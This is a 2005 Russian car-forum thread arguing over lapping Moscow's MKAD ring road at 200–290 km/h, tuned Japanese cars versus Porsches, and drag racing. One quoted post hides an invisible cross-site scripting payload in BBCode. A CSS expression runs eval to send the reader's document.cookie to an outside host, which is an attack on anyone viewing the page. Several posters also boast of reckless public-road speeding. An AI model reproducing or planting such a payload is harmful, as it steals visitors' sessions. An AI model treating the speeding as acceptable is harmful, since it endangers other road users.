Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
Sergio_furious
Зарегистрирован: 19.05.2004 Сообщения: 18
|
Добавлено: Ср Июл 06, 2005 11:57 am Заголовок сообщения: Нда... |
|
|
YanRS
Это кого еще надо в КПЗ сажать... Втирать про п**сию на 240 и самому закладывать 230 на стандартном джипе... Люди которые ездят на таких скоростях на тюненых машинах со спортивными подвесками с тюнеными тормозами и т.д. не придурки, они строят эти машины для этого, строят свои машины, потому что неплохо знают, что так ездить на стандартных машинках - самоубийство и не только "само", но и окружающих... А ваши рассуждения о кольце... настройте колец, куда может попасть простой смертный с нормальной инфраструктурой, может рейсеров поменьше станет. Хотя на кольце риска реально не меньше, там то реально на пределе идут, а на улицах я немного машин видел, проходящих повороты на пределе под визг резины. Если рассуждать как вы, то и с парашютом прыгать не стоит, и на роликах кататься, а уж на самолетах летать...когда можно по земле потихонечку переползти... Я за себя могу сказать, да я гоняю, 150-160 по мкаду если свободно - это нормально на моей Вектре 1.8 с АКПП, в 3 часа ночи как-то разогнался до 210, стало страшно... Понял, что надо менять подвеску, ставить другие тормоза... Но все это я делаю, когда нет опасности создать аварийную ситуацию, когда можно так ехать. Это опасно в определенной степени... Но иногда у меня очко играет больше когда я в маршрутке еду с водилой под 90-100 км по пробке по встречке. Все относительно. На мой взгляд выехать в 4-5 утра из 30 минут на круге МКАДа вполне реально на нормальной машине.
З.Ы. А про то, что Японка с 1.6 Вас надрала... это умение читать дорогу, чувствовать поток, максимальные возможности машины имеют значение на треке, а в городе больше работает голова и мастерство водителя... Не хвастаясь скажу для примера, что по Мкаду в среднем потоке шел минут 15 вместе с SL 500, даже обогнал его, потом кончились тормоза... :evil: Просто водила в мерине был никакой... Просьба это не комментировать это.
З.З.Ы. я бы рискнул, если бы аппарат подходящий был, только не за 10000 штук с камерами, чтоб кто-то на мне наварился нехило, а для себя, в хорошей компании, можно даже реально фильм снять нарезать на DVD и продавать, думаю затраты на бензин и организацию себя бы окупили |
|
Вернуться к началу |
|
|
Gena
Зарегистрирован: 20.05.2003 Сообщения: 763 Откуда: Ново-Переделкино
|
Добавлено: Ср Июл 06, 2005 4:43 pm Заголовок сообщения: |
|
|
2 YanRS
Ага, теперь я уважаемый. А до этого был сынком. О какой адекватности ты говоришь?
НА форуме есть люди, мнение которых, даже если оно не совпадает с моим, интересно читать, но это явно не ты. |
|
Вернуться к началу |
|
|
MajestiC
Зарегистрирован: 01.03.2005 Сообщения: 414 Откуда: Moscow Center
|
Добавлено: Ср Июл 06, 2005 4:53 pm Заголовок сообщения: |
|
|
Че вы так на него все накинулись, это по-моему единственный здравомыслящей человек на этом форуме. Он высказал свое мнение, с которым в чем-то можно согласиться, а с чем-то поспорить. Я во многом с ним согласен. Немного есть людей,которые на скорости 250 могут правильно среагировать, если вдруг на его ряд кто-то быстро перестроиться. Разве не так??? А насчет МКАДа за 30 мин. считаю это нереально. Проведу мат. подсчеты и сообщу попозже |
|
Вернуться к началу |
|
|
Kirill_na_PRESSO
Зарегистрирован: 10.08.2003 Сообщения: 743
|
Добавлено: Ср Июл 06, 2005 5:45 pm Заголовок сообщения: Re: Нда... |
|
|
VIDEO писал(а): | Лично я сегодня под утро проехал весь МКАД за 45 мин ничего особо не нарушая
Все посты проезжал не выше 120 км/ч , только на 3-4 участках разгонял до 220 км - ( дальше резина не позволяет )
в основном ехал 160-180 ( 2 раза меня обогнали )
мерин и какой-то субарик , вообщем-то ехал баз напряга
Машина Соарер , мотор 7M GTEU - 3000 TURBO |
Вот о чем и речь. Сейчас поясню смысл цифры в 290 км/ч в первом приближении. Возьмем идеальные условия: спидометр не «врет» и «160-180» держалась постоянно, а до 220 не разгонялись. Получается 108 км за 0,75 часа, те средняя скорость 144 км/ч. Чтобы показать 108 км за 0,5 часа нужна средняя 216 км/ч (т е 114 Х1,5). Это вовсе не означает, что нужно умножать скорости «160-180» на 1,5, что будет 240-270. Реально это цифра гораздо выше, потому как осаживать все равно придется. Прибавим для реальности погрешность спидометра (это около 15 на таких скоростях) и выходим на совсем оптимистическую цифру 255-285. Откуда, спросите, 290? Поясняю – последние цифры (в особенности близкие к 300) любая машина набирает очень неохотно, а на МКАД еще есть и довольно крутые подъемы.
VIDEO писал(а): | И хватит о безопасности, в конце концов колхоз- дело добровольное
Это ведь не РАЛЛИЙНЫЙ форум |
Заканчивай провоцировать юнцов. Если все же какой-нибудь псих согласиться слабо тебе с ним в машине проехать?
Sergio_furious писал(а): | Люди которые ездят на таких скоростях на тюненых машинах со спортивными подвесками с тюнеными тормозами и т.д. не придурки, они строят эти машины для этого, строят свои машины, потому что неплохо знают, что так ездить на стандартных машинках - самоубийство и не только "само", но и окружающих... |
90% тех, кто занимается тунинхом ездить вообще не умеют и постоянно ищут причину в машине, а не в себе.
Sergio_furious писал(а): | А ваши рассуждения о кольце... настройте колец, куда может попасть простой смертный с нормальной инфраструктурой, может рейсеров поменьше станет. |
Ты предлагаешь специально для тебя построить? То что есть не устраивает? Есть минимум три места в радиусе 50 км от Мск, где это можно сделать - две гоночные трассы и Дмитровский полигон.
Sergio_furious писал(а): | Хотя на кольце риска реально не меньше, там то реально на пределе идут, а на улицах я немного машин видел, проходящих повороты на пределе под визг резины. |
Конечно, что по улице разложиться, что на трассе, какая разница. А за кольцо еще платить надо, а в городе то бесплатно. |
|
Вернуться к началу |
|
|
Bra2ha
Зарегистрирован: 01.05.2002 Сообщения: 2368 Откуда: Moscow
|
Добавлено: Ср Июл 06, 2005 7:28 pm Заголовок сообщения: Re: Нда... |
|
|
Ну вы блин развели флуд...
ИМХО, люди в этом топе, которые утверждают, что мол 240 по МКАДу легко, просто никогда не попадали в реальные аварии... а если попадали и все равно продолжают так считать, то значит у них просто отсутствует способность учиться на собственных ошибках, а это, в свою очередь, ПОКАЗАТЕЛЬ!
2 YanRS: Тебе б поменьше "хелл"-овитости (от слова Хеллрэйзор )в высказываниях и тебя бы лучше понимали... |
|
Вернуться к началу |
|
|
total
Зарегистрирован: 18.05.2002 Сообщения: 2167 Откуда: Saab-club Russia
|
Добавлено: Ср Июл 06, 2005 7:35 pm Заголовок сообщения: |
|
|
ну ездил я 240 по мкад (скорость по спидометру) , ночью, скажу одно, ну наХ, дорога гавно, колеи и люди которые едут медленно, хотя ночью нонсенс, но все же... если хотите ставить рекорды, то снимайте дмитровский полигон и меряйтесь письками |
|
Вернуться к началу |
|
|
YanRS
Зарегистрирован: 03.03.2004 Сообщения: 465
|
Добавлено: Ср Июл 06, 2005 8:21 pm Заголовок сообщения: |
|
|
Gena писал(а): | 2 YanRS
Ага, теперь я уважаемый. А до этого был сынком. О какой адекватности ты говоришь? |
слово "сарказм" тебе известно?
Gena писал(а): | НА форуме есть люди, мнение которых, даже если оно не совпадает с моим, интересно читать, но это явно не ты. |
Проблемы индейцев шерифа не е**т |
|
Вернуться к началу |
|
|
YanRS
Зарегистрирован: 03.03.2004 Сообщения: 465
|
Добавлено: Ср Июл 06, 2005 8:25 pm Заголовок сообщения: Re: Нда... |
|
|
Bra2ha писал(а): |
2 YanRS: Тебе б поменьше "хелл"-овитости (от слова Хеллрэйзор )в высказываниях и тебя бы лучше понимали... |
я в общем-то доволен, тем что встряхнул этот форум. Кстати, что случается не первый раз
На самом деле, я уверен, что все правильно поняли мои слова, только не у всех хватило смелости, сознательности, разумности и т.д. и т.п. признаться в этом публично.
Всем удачи!
Берегите себя! |
|
Вернуться к началу |
|
|
Bobbie
Зарегистрирован: 15.07.2003 Сообщения: 1316 Откуда: Moscow
|
Добавлено: Ср Июл 06, 2005 8:27 pm Заголовок сообщения: Ни добавить, ни прибавить! |
|
|
Kirill_na_PRESSO писал(а): | 90% тех, кто занимается тунинхом ездить вообще не умеют и постоянно ищут причину в машине, а не в себе. |
sic! |
|
Вернуться к началу |
|
|
beep!
Зарегистрирован: 16.03.2005 Сообщения: 5609 Откуда: ЗАО
|
Добавлено: Ср Июл 06, 2005 11:03 pm Заголовок сообщения: |
|
|
dragfunk писал(а): | у нас особо не разгонишься слишком дороги плохие.
не пойму на западе асфальт по другому делают чтоли - там дороги совсем другие
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://salon.polar-star.ru/foto/data/pict.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' |
ты где ездишь? по дачам? дороги вполне для того чтобы прилично ездить :arrow: |
|
Вернуться к началу |
|
|
Trolik
Зарегистрирован: 09.02.2003 Сообщения: 933 Откуда: из 1000 миль
|
Добавлено: Ср Июл 06, 2005 11:48 pm Заголовок сообщения: |
|
|
YanRS писал(а): |
Хороший тюнинг спидометра однако.
На динамометрической дороге в Дмитрове всего два порша выехали из 300 км/ч, и еще один показал скорость близкую к 300, а именно 299 км/ч. В поршах 550+ hp.
Так кому верить? Чиста ракеру на японском бАлиде, что его телега с дизайном и аэродинамикой начала 90-х способона разогнаться "к скорости близкой к 300 км/ч" или здравой логике, которая утверждает, что немецкий спорткар с мощностью за 550 сил с огромным трудом способен разогнаться до 300 км/ч? При этом Порш обладает меньшей массой, лучшей аэродинамикой и более мощным мотором и едет по прямой и ровной динамометрической дороге. |
Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? или хотя бы сраный бокстер? я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! |
|
Вернуться к началу |
|
|
YanRS
Зарегистрирован: 03.03.2004 Сообщения: 465
|
Добавлено: Чт Июл 07, 2005 12:01 am Заголовок сообщения: |
|
|
Trolik писал(а): |
Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? или хотя бы сраный бокстер? я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! |
Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?
Короче, Супра никогда не станет Феррари! |
|
Вернуться к началу |
|
|
beep!
Зарегистрирован: 16.03.2005 Сообщения: 5609 Откуда: ЗАО
|
Добавлено: Чт Июл 07, 2005 12:03 am Заголовок сообщения: |
|
|
YanRS писал(а): | Trolik писал(а): |
Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? или хотя бы сраный бокстер? я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! |
Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?
Короче, Супра никогда не станет Феррари! |
если ты не знаешь .. напомню ... форум то драгов ... |
|
Вернуться к началу |
|
|
Trolik
Зарегистрирован: 09.02.2003 Сообщения: 933 Откуда: из 1000 миль
|
Добавлено: Чт Июл 07, 2005 12:05 am Заголовок сообщения: |
|
|
YanRS писал(а): | Trolik писал(а): |
Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? или хотя бы сраный бокстер? я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! |
Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?
Короче, Супра никогда не станет Феррари! |
Дело не в этом! Я вообще езжу с атмосферным мотором и не так часто приезжаю на гонки как хотелось бы. Супра и Феррари две разные вещи. Я задал вопросы, на которые не смог получить ответы. Я сказал, что порши это не показатели. |
|
Вернуться к началу |
|
|
YanRS
Зарегистрирован: 03.03.2004 Сообщения: 465
|
Добавлено: Чт Июл 07, 2005 12:05 am Заголовок сообщения: |
|
|
ГЕНий писал(а): | если ты не знаешь .. напомню ... форум то драгов ... |
Покажите хоть одну машину с этого форума, выезжающую из 11 секунд! |
|
Вернуться к началу |
|
|
Solobaric
Зарегистрирован: 11.06.2005 Сообщения: 456
|
Добавлено: Чт Июл 07, 2005 12:05 am Заголовок сообщения: |
|
|
YanRS писал(а): | Trolik писал(а): |
Не исключаю того что "японская аэродинамика начала 90-х" лучше чем некотырые обвесы TechArt Gembala или еще чего нибудь такого, они могли быть сделанны совсем для другого не говорю о 9ff. В плане веса YanRS ты знаешь сколько весит 996? или хотя бы сраный бокстер? я думаю что соарер полегче будет. К чему веду, к то му что порш с 550 не показатель, а во вторых порши какие-то мертвые никак не на 550.
Удачи! |
Парни, вы че, действительно уверены в том, что гонки в этой жизни ограничены пуканьем на 400м?
Вы что, действительно измеряете свою скорость размером надутого турбиной воздуха?
Короче, Супра никогда не станет Феррари! |
Купить Феррари и ездить на ней-одно.А купить супру,вложить в нее половину стоимости феррари и сделать индивидуальную машину,которая порвет всех и на квотере и в потоке - совсем другое.
После всех твоих постов появляется вопрос-на чем же ездишь ты?
Если не на Pagani,Saleen или даже старенькой Lambo,то я сильно разочаруюсь |
|
Вернуться к началу |
|
|
beep!
Зарегистрирован: 16.03.2005 Сообщения: 5609 Откуда: ЗАО
|
Добавлено: Чт Июл 07, 2005 12:06 am Заголовок сообщения: |
|
|
YanRS писал(а): | ГЕНий писал(а): | если ты не знаешь .. напомню ... форум то драгов ... |
Покажите хоть одну машину с этого форума, выезжающую из 11 секунд! |
для тебя драг .. это выезд из 11 секунд? ... езжай в америку ...
а машины не на форуме а в реале .... :arrow: |
|
Вернуться к началу |
|
|
YanRS
Зарегистрирован: 03.03.2004 Сообщения: 465
|
Добавлено: Чт Июл 07, 2005 12:09 am Заголовок сообщения: |
|
|
Trolik писал(а): | Я задал вопросы, на которые не смог получить ответы. |
No Replacement For Displacement!
Сколько объема в поршаке GT2 и соарере? |
|
Вернуться к началу |
|
|
sloniк
Зарегистрирован: 03.04.2005 Сообщения: 953
|
Добавлено: Чт Июл 07, 2005 12:11 am Заголовок сообщения: |
|
|
YanRS
это под*ёб!
ты и сам прекрасно знаешь, что в россии машин, которые выезжают из 11 секунд можно уместить на пальцах одной руки . зачем тогда так писать?
ну да, отстали мы во всём от остального мира, но хотя бы в отношении драга потихонечку догоняем . |
|
Вернуться к началу |
|
|
beep!
Зарегистрирован: 16.03.2005 Сообщения: 5609 Откуда: ЗАО
|
Добавлено: Чт Июл 07, 2005 12:12 am Заголовок сообщения: |
|
|
slonik[vectra-club] писал(а): | YanRS
это под*ёб!
ты и сам прекрасно знаешь, что в россии машин, которые выезжают из 11 секунд можно уместить на пальцах одной руки . зачем тогда так писать? |
Я бы сказал зачем он это написал .. да в бан не хочу :evil: :arrow:
просто не понимаю народ .. который тут тусит .. и спрашивает потом .. а что вам драг важнее чем какие либо другие гонки?
смешно становится :arrow:
Последний раз редактировалось: beep! (Чт Июл 07, 2005 12:14 am), всего редактировалось 2 раз(а) |
|
Вернуться к началу |
|
|
|
|
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах
|
Powered by phpBB © 2001, 2005 phpBB Group
|